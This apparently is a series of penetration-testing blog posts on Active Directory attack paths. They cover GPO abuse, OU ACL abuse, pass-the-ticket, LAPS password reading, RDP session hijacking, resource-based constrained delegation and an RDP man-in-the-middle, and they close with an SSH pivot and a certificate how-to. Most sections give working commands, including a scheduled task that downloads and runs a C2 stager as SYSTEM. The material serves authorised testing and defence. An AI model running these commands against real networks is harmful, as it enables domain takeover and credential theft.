GPO Abuse – Edit permissions misconfiguration

In this scenario we take a look at GPO abuse, where domain users, or a specific compromised user (Jane in this example), have edit permissions over a GPO that affects a large number of machines (OK, only one in the lab!). This post highlights the dangers of that misconfiguration and walks through a proof of concept to demonstrate the risk. Clearly this can be deadly: it can be used to spread ransomware, malware or reverse shells, and to push any number of settings to the computer objects affected by that GPO. As a computer policy, the settings are applied in the context of NT AUTHORITY\SYSTEM (the highest privilege level on a Windows system). The scenario could also be that we have control over an Organisational Unit rather than a specific GPO (i.e. creating a new GPO and linking it to that OU).

Let’s start by enumerating all the permissions for all GPOs in the current domain with PowerView:

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
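If the output is overwhelming, a quick filter helps pull out the interesting entries. A rough sketch using the same PowerView functions (exact property names can vary slightly between PowerView versions):

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? { $_.ActiveDirectoryRights -match 'Write|GenericAll' -and $_.IdentityReference -match 'Domain Users' }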

We find that the group 'Domain Users' has the ability to modify the 'Dodgy Policy' GPO, which is linked to the 'Development' OU containing the 'File1' computer object. In BloodHound this looks like:

The misconfiguration in the Group Policy Management GUI would look similar to this (it could equally be a security group or an individual user); in this case we have used 'Domain Users':

We can use the RSAT (Remote Server Administration Tools) GUI and/or PowerShell modules to modify the policy or create a new one:

New-GPO -Name 'dodgey policy' | New-GPLink -Target 'OU=Development,OU=Servers,OU=Resources,DC=Jango,DC=com'

The effects of this attack can be wide reaching in terms of the number of affected hosts. In such a situation, whilst on a penetration test, it would be wise to consider limiting the targets of a new GPO to a couple of specific hosts. We can do this in two ways:

1. Object level targeting by applying a WMI filter: in the GPO settings you can target various AD or WMI objects, for example with a WQL query similar to: SELECT * FROM Win32_ComputerSystem WHERE Name = 'FILE1'.

2. Security Filtering: remove the default 'Authenticated Users' entry and add the computer name or a security group containing the relevant computer objects (a scripted example follows below).
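If you prefer to script the security-filtering route, the RSAT GroupPolicy module can handle it. A minimal sketch, assuming the lab's 'dodgey policy' GPO and the FILE1 computer object (note that since MS16-072 the machine still needs read access to the GPO, so Authenticated Users is dropped to read rather than removed outright):

# drop Authenticated Users from apply to read only
Set-GPPermission -Name 'dodgey policy' -TargetName 'Authenticated Users' -TargetType Group -PermissionLevel GpoRead -Replace
# scope the GPO so it only applies to the FILE1 computer object
Set-GPPermission -Name 'dodgey policy' -TargetName 'FILE1' -TargetType Computer -PermissionLevel GpoApply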

Some versions of PowerView (to the best of my knowledge) contain a 'New-GPOImmediateTask' function, which can create an immediate scheduled task that runs once the GPO refreshes. We can push any PowerShell or CMD command, such as a stager, launcher or download cradle.

I wasn't able to find the New-GPOImmediateTask function in the latest version of PowerView on GitHub, however it is in this branch: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1

The following syntax is used:

New-GPOImmediateTask -TaskName Debugging -GPODisplayName Dodgeypolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO…' -Force

You can remove the schtask .xml after you get execution by supplying the -Remove flag like below (this is a nice feature):

New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy

I wasn't able to get this working in my labs, however, not deterred, I looked for an alternative way. The alternatives are the standard RSAT GUI (not very red team) and SharpGPOAbuse. SharpGPOAbuse does essentially the same job as PowerView by modifying the target GPO, which, when applied to a machine, creates a scheduled task that runs immediately.

First compile SharpGPOAbuse in Visual Studio (a process that warrants a write-up in its own right).

Next we will use the Assembly Task from within Covenant, with the following parameters:

--AddComputerTask --TaskName "Task1" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://192.168.1.104/GruntHTTP.ps1')" --GPOName "dodgey policy"

Great, we can see the commands executed successfully in our Covenant output and the GPO has been updated; we can also see the file that has been modified in SYSVOL on the DC!

If we look in Group Policy Management console on the DC we can see specifically what has been set:

Once the GPO has been refreshed (every 90 minutes by default, plus a random offset) we can verify our results on the target system 'File1', where we can see that Task1 has been applied in the Task Scheduler:
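In a lab you don't have to wait for the background refresh interval; you can trigger it on the target yourself:

gpupdate /force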

The proof is always in the pudding, and we can see a grunt has connected:

Things to consider from a pentesting perspective:

  • The impact could be significant, so understand how this affects your position: how many machines will this affect, and what sort of machines are they (critical infrastructure)?
  • An alternative route to reach your goal may have less of an impact.
  • An alternative approach to highlight this risk to a client might be to simply demonstrate it through RSAT by creating a blank GPO and linking it to the OU, without creating the task or any actions.
  • To the best of my knowledge there is no 'remove' or 'reverse' action within SharpGPOAbuse to revert or clean up our modifications. As a pentester/red team member you should be mindful of this. Depending on the engagement, I would suggest this is run in conjunction with the POC, or that you have the ability to clean up both the task it creates and the GPO changes.
  • This is not OPSEC safe, admins may see the changes in the GPO console.
  • Always remember to clear up after yourself.

Hopefully this has demonstrated how powerful and dangerous this sort of misconfiguration can be in the enterprise. For the blue team, check your configuration with BloodHound to understand any weaknesses you may have.


DACL Trouble: GenericAll on OUs

Take the following scenario:

This is a bit of an odd one, however misconfigurations, as we know, happen. Our standard user Ted has the GenericAll DACL permission over the 'Development' OU (Organisational Unit) object. Our target admin 'Terry_adm' also sits under the Development OU, however we don't automatically have GenericAll over this account, just the OU. So how do we take advantage of this privilege and abuse GenericAll to compromise the Terry_adm account? Let's walk through a proof of concept.

Let's first take a look at this configuration in AD Users and Computers. We can see that the principal 'Ted' only has full control over 'This object only', i.e. the Development OU. We will look to effectively extend this to all descendant objects, as shown in the attack path in BloodHound, to get to Terry_adm:

Let's first prove we don't have access to the target admin account terry_adm by trying to reset its password:
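The attempt looks something like this (a PowerView sketch; the password value is just illustrative):

$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity terry_adm -AccountPassword $NewPassword -Verbose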

OK fine, we don't have access to change Terry_adm's password.

Next we will need the Development OU's GUID; we can use PowerView for this or get it from BloodHound:
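For example, a PowerView sketch, assuming the OU is simply named 'Development':

Get-DomainOU -Identity Development -Properties name,objectguid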

Once we have this we can build the ACE on the Development OU object to give ourselves access to all descendant objects of the OU. The below is a one-liner; remember to change both the 'PrincipalIdentity' value to the username that holds the GenericAll permission and the GUID of the OU (read through the below and try to understand what it's doing):

$Guids = Get-DomainGUIDMap; $AllObjectPropertyGuid = $Guids.GetEnumerator() | Where-Object {$_.value -eq 'All'} | Select -ExpandProperty name; $ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity Ted -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectPropertyGuid; $OU = Get-DomainOU -Raw '3346827a-1a03-4345-99da-c991532481cf'; $DsEntry = $OU.GetDirectoryEntry(); $dsEntry.PsBase.Options.SecurityMasks = 'Dacl'; $dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE); $dsEntry.PsBase.CommitChanges()

If we then wait a few minutes and try to reset Terry_adm's password again, to prove we now have GenericAll against all descendant objects of the OU, we get:

Nice.

Lets quickly take a look in the backend and review the DACL in AD Users and Computers for the Development OU:

Very nice, we can now see that 'This object and all descendant objects' has been applied. Remember, as a tester you will need to reverse your actions.
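A cleanup sketch, mirroring the one-liner above and assuming $ACE is still populated in your session (otherwise rebuild it exactly as before), removes the ACE we added:

$OU = Get-DomainOU -Raw '3346827a-1a03-4345-99da-c991532481cf'; $DsEntry = $OU.GetDirectoryEntry(); $DsEntry.PsBase.Options.SecurityMasks = 'Dacl'; $DsEntry.PsBase.ObjectSecurity.RemoveAccessRuleSpecific($ACE); $DsEntry.PsBase.CommitChanges()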

The same process can be applied to computer objects; once the ACE is created, follow the 'Resource-based Constrained Delegation: Attack Path' post for computer takeover.

Big thanks to SpecterOps who demonstrate the process here.


Pass the Ticket: PtT

Take the following scenario: you have local admin rights on a server and have identified that a high value target has a logged-in session on it. Where do you go from here? From the BloodHound screenshot below we can see that Bob_adm has a session on web1.

Let's explore compromising the bob_adm session. First we'll log in to web1, dump the tickets using Mimikatz and then reuse one of them to impersonate that user.

First we load Mimikatz in a high integrity session and run "privilege::debug" followed by "sekurlsa::tickets /export".

This will export a bunch of tickets into the directory where you ran mimikatz from and will look similar to this:

Notice the differences between the tickets: some are Ticket Granting Tickets (TGTs), which have been used to obtain Ticket Granting Service (TGS) tickets for specific services such as LDAP, CIFS etc. The ticket we are interested in is the krbtgt one, i.e. the TGT.

Next we will use mimikatz to inject one of the kirbi files into our own session:

kerberos::ptt [0;141473]-2-0-40e10000-bob_adm@krbtgt-JANGO.COM.kirbi

If we check the ticket we can see the following in mimikatz:

And then in Windows with klist:

Then finally, to impersonate bob_adm, we test our newly injected ticket by browsing to the C$ share on the domain controller:
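Something as simple as the following does the job (the DC hostname here is assumed from the lab):

dir \\dc16.jango.com\C$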

Nice.


LAPS ms-Mcs-AdmPwd enumeration/attack vector

Take the following scenario: we have compromised Ted's account and identify that he has LAPS read permissions over a few boxes. How do we go about taking advantage of that from the red team perspective? Well, it's pretty straightforward with no catches: we just read the ms-Mcs-AdmPwd attribute from the AD computer object.

ReadLAPSPassword

In this case our compromised user has the ability to read the 'ms-Mcs-AdmPwd' LAPS attribute on SQL1, which holds the password for the local administrator account. With the right tools Ted can read this attribute; we will use PowerView.

Import PowerView (in this instance I'm using Covenant, the .NET command and control framework):

Using PowerView to read the ms-mcs-AdmPwd attribute
Get-DomainObject SQL1.Jango.com -Properties "ms-mcs-AdmPwd",name

If we look at the attribute editor in AD Users and Computers for the SQL1 account we can see this aligns:

Showing the ms-Mcs-AdmPwd AD computer object attribute.

Easy!

Note: the moral of this story is to ensure the principle of least privilege is followed; ask yourself whether Ted was supposed to be in that group. I've written about the benefits of LAPS here and here, however careful configuration is required. Ensure your LAPS permissions are in check.
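A quick way to sanity-check who can actually read the attribute on a given computer object is to review its ACL. A rough PowerView sketch (property names may differ slightly between versions; pipe the SecurityIdentifier through ConvertFrom-SID to resolve names):

Get-DomainObjectAcl -Identity SQL1 -ResolveGUIDs | ? { $_.ObjectAceType -eq 'ms-Mcs-AdmPwd' -and $_.ActiveDirectoryRights -match 'ReadProperty' } | select SecurityIdentifier, ActiveDirectoryRights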


Stealing RDP Sessions

Take the following scenario: you compromise a box through a Kerberoastable SPN, which just so happens to be a SQL account that has been added to the local administrators group on the SQL server (a very common scenario). Also logged into the server via RDP is another admin. We can effectively take over that session with native Microsoft tooling, using Remote Desktop Services session takeover via tscon:

We RDP in and enumerate the logged-on sessions with 'query user'.

We can see that bob_adm is also logged on and is in an 'Active' session. Now, this is a very risky manoeuvre and should really be considered a last resort, as it will effectively take over the other user's session. If you try to connect to the user's session through Task Manager, like below, you will be prompted for a password:

However, the key thing here is that you don't need the user's password if you run the process as local SYSTEM.

We can achieve this quite simply, in one of two ways:

Create a simple service like the below, which will run in the context of local SYSTEM:

sc create rdptakeover binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"

Looking at the service in more detail it is in fact created to run as local SYSTEM:

We can then just start the service with:

sc start rdptakeover

The RDP session that you're currently logged in with will literally switch over to the other session instantly.

The same process can be achieved with mimikatz as below:

The commands being:

privilege::debug
token::elevate
ts::sessions
ts::remote /id:2

One way we can reduce the impact of this is to use Group Policy to log off disconnected remote sessions after a time limit; we do this with the following policy:

Administrative Templates / Windows Components / Remote Desktop Services / Remote Desktop Session Host / Session Time Limits

Active Directory Resource-based Constrained Delegation: Attack Path

Take the following scenario:

Our standard user Ted has GenericAll rights over file1.jango.com. How do we take advantage of this privilege? First, let's just prove we don't have access to the target server:

We will need the following info (track this as you go):

Target Computer Name: file1.jango.com
Admin on Target Computer: administrator
Fake Computer Name: fakecomputer
Fake Computer Sid: S-1-5-21-759278571-4292840072-3113789661-1116
Fake Computer Password: Password1

Using Powermad we can create a fake computer account; by default any domain user can add up to ten machine accounts to the domain:

Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount fakecomputer -Password $(ConvertTo-SecureString 'Password1' -AsPlainText -Force)

Get the SID for the new fakecomputer object with PowerView:

Get-DomainComputer fakecomputer -Properties objectsid | Select -Expand objectsid

Next, build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-759278571-4292840072-3113789661-1116)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer file1 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

No output will be generated for this, so to verify this has worked run the following:

$RawBytes = Get-DomainComputer file1 -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity; $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0; $Descriptor.DiscretionaryAcl

We can see that the ACE has been built:

NOTE: this will modify the 'msds-allowedtoactonbehalfofotheridentity' attribute of the target computer system!

Now that our new machine fakecomputer is trusted by file1, we can forge a ticket with Rubeus:

First we need the RC4_HMAC (NTLM) hash of the fake computer's password:

Rubeus hash /password:Password1 /user:fakecomputer /domain:jango.com

Then we can craft the ticket:

Rubeus s4u /user:fakecomputer$ /rc4:64F12CDDAA88057E06A81B54E73B949B /impersonateuser:bob_adm /msdsspn:cifs/file1.jango.com /ptt

Verify we can now access the C:\ drive of the target machine. NOTE: the above ticket has been crafted specifically for access to that service on the target machine ONLY:
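For example:

dir \\file1.jango.com\C$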

We can also verify by looking at the tickets with the built-in klist and then Rubeus:

Finally, to clean up, clear the modified 'msds-allowedtoactonbehalfofotheridentity' attribute on the AD object with PowerView:

Get-DomainComputer file1 | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'

Thanks to both harmj0y and wald0 for these excellent posts on the subject:

https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/

https://www.youtube.com/watch?v=RUbADHcBLKg


PowerShell History and Aliases

PowerShell history is session-based by default; however, your long-term history is available here:
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

To make this a little more accessible we will create a profile script that gets executed every time you fire up PowerShell, along with an alias for the above command:

First we will create the profile script under: C:\users\adam\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
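If the file doesn't exist yet, one way to create it is via the $PROFILE variable, which resolves to that same path for the Windows PowerShell console host:

New-Item -ItemType File -Path $PROFILE -Force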

Then, in your favourite PowerShell editor, we will add our alias to the Microsoft.PowerShell_profile.ps1 file in the form of a simple function:

function historyfunc {
    type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
}
Set-Alias extra-history historyfunc

Now you can just run 'extra-history'. Note that you may need to adjust your script execution policy, as every new session will want to run your profile .ps1 script. Enjoy!
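On the execution policy point, something along these lines usually sorts it (pick the policy and scope appropriate for your environment):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser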



Networking Pivoting via SSH – Scanning with Nessus Professional behind a Firewall or NAT.

In this post I'm going to cover the process of scanning a network behind a firewall or NAT by pivoting over SSH, without being limited to proxychains and specific ports or protocols. Essentially this uses SSH tunnelling, virtual tap adapters, some routing and masquerading in iptables. The beauty of this method is that the prerequisites are very low; for the most part no additional packages or standalone tools are required, we can use what is shipped with most Linux builds.

There are many use cases for this: scanning an internal network without being on prem, cloud environments, and various pentesting scenarios where this is often the stumbling point once a shell has been landed. Traditionally this type of task would have been done with proxychains, through some form of shell access via a netcat listener, Metasploit or an SSH dynamic port forward, which I have previously walked through here. However, this is an extremely slow method and relies on being able to tunnel everything through a single port with proxychains; I have never had any luck scanning with more complex tools like Nessus in this way. Full TCP connect scans (-sT) with nmap work great, Nessus not so much.

Let's take the following scenario and set the pivot up:

Networking Pivoting via SSH

We can use tunctl or ip tuntap, the difference being that ip tuntap is part of the iproute2 suite and therefore generally supported on most Linux operating systems, whereas tunctl usually needs to be installed from your repo of choice, e.g. on Ubuntu it is part of the apt repository. In this example we will be working with Kali as the scanning system and an Ubuntu server as the pivot point, which has SSH accessible. (It is worth mentioning at this point that it doesn't matter which end the SSH connection is initiated from.)

First we need to create a virtual tunnel, which means creating a virtual interface at each end. For this we are going to use a tap interface; for reference, a tap interface operates at layer 2 and a tun interface operates at layer 3.

Using tunctl: first we will need to install tunctl, which is part of the uml-utilities package:

# apt install uml-utilities

Create the virtual tap interface with the following command:

# tunctl -t tap0

Using ip tuntap: first verify that the version of iproute2 installed supports tuntap; type 'ip' and you will see whether the tuntap object is available:

# ip

Create the virtual tap interface with the following command:

# ip tuntap add dev tap0 mode tap

Once this is set up, assign an IP address to the interface and bring it up, using a different address at each end of the tunnel:

So on the scanner:

# ip a a 10.100.100.100/24 dev tap0 && ip link set tap0 up

On the pivot server:

# ip a a 10.100.100.101/24 dev tap0 && ip link set tap0 up

On each end of the tunnel we will also need to make sure our SSH configuration allows tunnelling. Let's modify the /etc/ssh/sshd_config file by adding 'PermitTunnel yes' to the end and restarting the service. More about this option can be found in the sshd_config man page here.
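For reference, after adding the 'PermitTunnel yes' line, restart the daemon (the service name may be sshd rather than ssh depending on the distribution):

# systemctl restart ssh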

Now for the magic: let's bring the tunnel up by establishing an SSH session. This will need to be done with a privileged account:

ssh -o Tunnel=ethernet -w 0:0 root@11.1.1.11

Let's cover off these options:

  • -o = allows us to specify options
  • Tunnel=ethernet = requests a layer 2 (tap) tunnel rather than the default layer 3 (tun) tunnel.
  • -w 0:0 = requests tunnel device 0 on the local and remote sides, i.e. tap0 at each end of the tunnel.

Next let's take a moment to verify our tunnel is up with a couple of quick checks:

First verify the link is up with ethtool:

# ethtool tap0

You will notice the link is up; try this without the SSH connection and you will find the link is down.

Second verify you can ping the other end of the tunnel:

# ping 10.100.100.101

Again, disconnect your SSH connection and watch the ICMP responses drop.

Next, in order to get our traffic to the destination servers/subnets, we need to add some routes on Kali to tell the system to send that traffic via the other end of the tunnel. Something similar to this, where 192.168.1.0/24 and 192.168.2.0/24 are the networks you are targeting:

# ip route add 192.168.1.0/24 via 10.100.100.101

# ip route add 192.168.2.0/24 via 10.100.100.101

Finally, we need to set up some iptables rules and turn our pivot point into a router by enabling IPv4 forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# iptables -t nat -A POSTROUTING -o tap0 -j MASQUERADE

# iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# iptables -A INPUT -i tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# iptables -A FORWARD -j ACCEPT

At this point the pivot should be up and running; test this by doing some basic checks against a known host on your target network.

Happy pivoting testers!


Self Signed Certificates + Remote Desktop Protocol = MiTM and Creds – This is a problem, don’t ignore it!

In this post I am going to highlight the risks of using self-signed certificates with Remote Desktop Protocol (RDP): why it's a problem and what we can do to fix it. Hopefully, by demonstrating the impact, it will raise awareness of how serious an issue this can actually be.

On an internal network the issue is that when you connect over Remote Desktop to a computer or server that is using a self-signed certificate, you are not able to verify the endpoint's authenticity, i.e. that it is who it says it is.

Unfortunately we are all too familiar with the classic RDP certificate warning prompt like this, and most of the time we blindly click 'Yes, I accept', often without actually reading what the message is saying.

OK, let's see what all the fuss is about then. Let's consider the following devices in our lab:

DC16: 192.168.1.10 – Windows Server 2016 domain controller

WEB16: 192.168.1.52 – Windows Server 2016 web server

W10: 192.168.1.51 – Windows 10 client

Kali: 192.168.1.50 – Kali Linux, our attacker.

The attacker can essentially sit on the same network and cause a man-in-the-middle (MiTM) condition between the Windows 10 client and the web server when a self-signed certificate is in use. Let's expand on the scenario slightly: imagine we have an admin logged in to our Windows 10 client who wants to investigate an issue on the web server, and so goes to establish a remote desktop session to it. Let's consider what can happen.

To demonstrate this attack we are going to use 'Seth', a tool to perform a MiTM attack and extract clear text credentials from RDP connections. The code is located here: https://github.com/SySS-Research/Seth , and you can find a more detailed talk about the tool by its creator Adrian Vollmer here: https://www.youtube.com/watch?v=wdPkY7gykf4.

On our attacking machine we are going to start Seth:
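Seth takes the interface, the attacker IP, the victim IP and the target host (or gateway) IP as arguments; with our lab addressing, and assuming the Kali interface is eth0, that looks something like:

./seth.sh eth0 192.168.1.50 192.168.1.51 192.168.1.52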

Meanwhile, our admin is going about his/her daily tasks on the Windows 10 client and decides to connect to our web server via RDP:

The usual connection sequence takes place, the admin receives the all too familiar warning box and continues to establish the connection. Meanwhile, over on our attacking box, the connection has been intercepted and the MiTM attack carried out successfully. Seth has captured the NTLMv2 hash as well as the clear text credentials. Oh dear.

As you can see this is not an optimal configuration, and one which we would very much like to avoid. It can be avoided by using a certificate signed by your internal CA or another trusted certificate authority. Getting certificates installed on your devices isn't all that difficult; I discuss this further here and link to a how-to. In addition, we can also stop our clients from connecting to anything we don't trust via GPO. Remember, we need to connect to our servers by name, not IP, as the IP address is not what is in the certificate's common name field and the connection will therefore be untrusted.

Well, I hope this has helped demonstrate the impact of self-signed certificates and why they should be addressed on the inside.

Generating a certificate for a non-domain joined device using an internal AD CA – i.e. pfSense

I thought I would walk through the process of generating a certificate for a non-domain joined device using an internal Active Directory Certificate Services (AD CS) certificate authority. In this example it is going to be for the web GUI of a pfSense firewall. I've talked before about the challenges of self-signed certificates in this post, so thought this would be useful to further demonstrate how certificates can be issued for other devices that are not joined to a domain. Like most things, if you have never set something like this up before, you won't necessarily know how to go about doing it. This post aims to fill that gap. Hopefully you will see this isn't as difficult as it sounds.

For our lab we have AD CS set up and pfSense on the same network; it's actually acting as the gateway for the network. It's a key piece of equipment that we want technical security assurance around, including being able to validate that when we connect to the device for management it is who we think it is, and importantly who it says it is, and that we are not leaving ourselves open to a man-in-the-middle attack.

Let's start on the pfSense web configurator page:

As we can see this is using a self-signed certificate and is therefore untrusted. So we want a certificate on our firewall that is signed by a trusted certificate authority, ideally one that is already in our root certificate store. If you have an internal AD CS, the root CA certificate will most likely already be there.

Typically with a network device such as this we first want to generate a Certificate Signing Request (CSR) to then take to our CA to be signed. You can usually achieve this via a shell session to the device or through the web GUI. Whilst the steps I'm going through with pfSense are specific to this device, the concept is the same for all devices. With pfSense we are able to do this here:

We can see in the above screenshot the self-signed certificate that comes with the device. To start the process we click on the green Add/Sign button at the bottom. As you can see below, the method we want to use is 'Create a Certificate Signing Request'.

Continue down the page adding all the relevant info. Three key areas to take note of are the 'Common Name', the 'Alternative Names' and selecting 'Server Certificate' for the certificate type. These are important, as this is how we will identify the authenticity of the device. The 'Common Name' is effectively its short name, and in the 'Alternative Names' we will want to add the Fully Qualified Domain Name (FQDN). In this case I'm naming the firewall FW1, and Jango.com is the domain name 🙂 .

Once at the end of the page, select Save and you should see the certificate request in a pending state; the screen should look like this:

Next export the CSR, download it to your local machine and open it in notepad. Highlight the text and copy it to your clipboard for later. The file should look like this:

Next we are going to find our way to the AD CS certificate enrollment web page. This is commonly the CA name followed by '/certsrv/default.asp'; in my lab the CA is held on the DC, so it will be http://DC16/certsrv/default.asp, just like below:

Next we select ‘Request a certificate’:

Here we don't have many options, as this is a fairly default install of the certificate services, however select 'Advanced Certificate Request'. On the next screen, as below, paste the CSR into the request window, select the default 'Web Server' template from the 'Certificate Template' drop down menu and click submit:

Next we have the opportunity to download the signed certificate in various formats.

In this instance we are going to download the certificate in Base 64 encoded format. Open up the certificate file in notepad, highlight the contents and copy it to the clipboard; it should look like this:

Next we go back to the pfSense web GUI and complete the certificate signing request from the certificates page. This is under 'System' -> 'Certificate Manager' -> 'Certificates'. We do this by selecting the update CSR button, pasting the contents of the certificate into the 'Final certificate data' field like below and selecting 'Update':

The certificate will be loaded and will look like this:

As we can see from the above screenshot, our Subject Alternative Names are listed as FW1 and FW1.jango.com, meaning that when we access the page with these names the connection will be validated correctly, as opposed to accessing it via IP address, where the browser will warn us that it has not been able to validate the endpoint and the connection is therefore insecure.

Next we change how the certificate is used, essentially binding it to port 443, the web GUI itself. We do this in System -> Advanced -> Admin Access: select the descriptive name we gave the certificate earlier and click 'Save' at the bottom of the page:

Next, reload the web GUI page using your common name or subject alternative name. At this point bear in mind you will most likely need a manual DNS entry for FW1, so head over to the DNS console and quickly create one. Once you have done that, reload the pfSense web GUI, and hey presto!
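As an aside on that DNS entry: if your DNS is AD-integrated you can also add the record from PowerShell on the DC rather than through the console. A sketch (the firewall's IP address here is an assumption for this lab):

Add-DnsServerResourceRecordA -ZoneName 'jango.com' -Name 'FW1' -IPv4Address '192.168.1.1'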

and..

Now we have a certificate signed by our internal AD CA and can verify what we are connecting to is actually correct.

I hope this has helped demystify the process of obtaining an internally signed certificate from our AD CA for the weird and wonderful network devices that we have on the network.